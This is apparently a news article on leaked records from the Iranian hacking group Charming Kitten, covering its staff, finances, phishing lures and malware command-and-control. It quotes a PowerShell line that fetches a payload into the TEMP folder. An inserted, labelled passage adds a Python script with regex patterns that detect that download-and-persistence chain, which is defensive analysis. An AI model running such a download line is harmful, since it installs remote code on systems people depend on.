Recent leaks originating from the Iranian state-sponsored hacking group “Charming Kitten,” also identified as APT35, have exposed critical personnel, front companies, and thousands of compromised digital systems across five continents. These revelations provide an unprecedented, granular view into the operations of Iran’s Department 40 within the IRGC Intelligence Organization, detailing how they conduct sustained cyber-espionage, surveillance, and targeting campaigns.
Internal documents, including stolen dashboards and payroll records, now directly link named operators to specific cyber-attacks, moving beyond anonymous threat actor labels. The leaked financial data further elucidates the underlying economic structure supporting these operations. This includes salary slips attributed to internal teams, such as the ‘Sisters Team’ and ‘Brothers Team,’ and evidence of funds being routed through shell companies that masquerade as legitimate IT and cloud service providers. The scale of compromised systems is extensive, encompassing VPN gateways, email servers, and command-and-control infrastructure utilized to manage malware deployed within government agencies, academic institutions, and telecommunications providers worldwide.
Charming Kitten Leak Details Operational Structure
The leaked materials offer a comprehensive picture of the convergence of financial resources, management directives, and malware deployment within a single, coordinated system. Security researcher Nariman Gharib, who analyzed the data, noted that the collection also includes tasking sheets and target lists. These documents explicitly connect Charming Kitten’s malware activities to specific networks operating in the diplomatic, energy, and civil society sectors.
Typically, infections are initiated through sophisticated spear-phishing emails, deceptive login pages, or malicious document attachments. These lures often impersonate legitimate communications such as meeting invitations, pay stubs, or official policy documents. Once a target opens the lure and is prompted to enable scripts or provide credentials, the operators gain an initial foothold, which can then escalate to full system control and subsequent data exfiltration.
Analysis of the leaked dashboard logs reveals consistent communication patterns from victim hosts back to Iranian-controlled servers. This communication, often disguised as routine web traffic via HTTPS, occurs at regular intervals. The compromised systems implicated in these patterns include critical infrastructure such as email gateways, domain controllers, and individual user laptops, granting operators access to sensitive email communications, shared files, and identity management systems. The report highlights distinct clusters of infected machines, categorized by geographical region and industrial sector, underscoring the broad reach of these cyber operations.
Infection Mechanism and Command and Control
The initial stages of infection commonly involve a small loader program that executes in memory. This loader is typically activated after a user interacts with a macro-enabled document or an HTML lure. Subsequent commands, often leveraging PowerShell, fetch the primary malware payload from a fixed but concealed URL. This technical breakdown of Charming Kitten’s tools and methods has been thoroughly documented.
Invoke-WebRequest $u -OutFile "$env:TEMP\svc.exe"
Examination of the leaked operational logs indicates that this downloaded binary is frequently installed as a scheduled task. This configuration ensures persistent access to the compromised system while allowing its activities to blend with standard Windows operational processes, making detection more challenging.
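The two stages just described (a PowerShell download into a temp directory, then a scheduled task pointing at that binary) can be turned into a host-level triage rule. The script below is an added example, not code from the article or the leaked material: it runs over constructed log lines in a hypothetical "<host> <event_id> <message>" layout (event IDs 4104 and 4698 are the real Windows IDs for PowerShell script block logging and scheduled task creation; the host names and messages are made up) and rates a host "high" when both stages are seen.

```python
import re
from collections import defaultdict

# Constructed sample lines (hypothetical layout: "<host> <event_id> <message>").
SAMPLE_LOGS = r"""
ws-17 4104 Invoke-WebRequest $u -OutFile "$env:TEMP\svc.exe"
ws-17 4698 Scheduled task created: \Microsoft\Windows\SvcUpdate action=C:\Users\j\AppData\Local\Temp\svc.exe
ws-03 4104 Invoke-WebRequest https://intranet.example/report.csv -OutFile C:\Reports\report.csv
ws-22 4698 Scheduled task created: \Backup\Nightly action=C:\Program Files\Backup\run.exe
ws-09 4104 iwr $u -OutFile "$env:TEMP\a.exe"
""".strip().splitlines()

DOWNLOAD_CMD = re.compile(r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString)\b", re.I)
OUTFILE = re.compile(r"-OutFile\s+\"?([^\s\"]+)", re.I)
TEMP_PATH = re.compile(r"(\$env:TEMP|%TEMP%|\\Temp\\|\\AppData\\)", re.I)
TASK_ACTION = re.compile(r"action=(.+)$", re.I)

def parse(line):
    host, event_id, msg = line.split(" ", 2)
    return host, int(event_id), msg

def suspicious_download(msg):
    """Download cmdlet whose -OutFile target is a user-writable temp location."""
    m = OUTFILE.search(msg)
    return bool(DOWNLOAD_CMD.search(msg) and m and TEMP_PATH.search(m.group(1)))

def suspicious_task(msg):
    """Scheduled task whose action binary lives under Temp or AppData."""
    m = TASK_ACTION.search(msg)
    return bool(m and TEMP_PATH.search(m.group(1)))

def triage(lines):
    """Map host -> severity; both stages on one host is the loader-to-persistence chain."""
    hits = defaultdict(set)
    for line in lines:
        host, eid, msg = parse(line)
        if eid == 4104 and suspicious_download(msg):
            hits[host].add("temp_download")
        elif eid == 4698 and suspicious_task(msg):
            hits[host].add("temp_task")
    return {h: ("high" if len(s) == 2 else "medium") for h, s in hits.items()}

if __name__ == "__main__":
    for host, severity in triage(SAMPLE_LOGS).items():
        print(host, severity)
```

Hosts that only download to a temp path (ws-09) or only register an ordinary task (ws-22) are kept apart from the one showing the full chain (ws-17).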
The implications of this leak are significant for global cybersecurity. The detailed exposure of Charming Kitten’s operational methods, personnel, and financial backing provides intelligence agencies and cybersecurity firms with actionable insights to bolster defenses against state-sponsored threats. The evidence of financial structures and named operators suggests a systematic and well-resourced cyber warfare capability emanating from Iran. As this information becomes more widely analyzed, the international community anticipates potential diplomatic responses and further cybersecurity strengthening measures.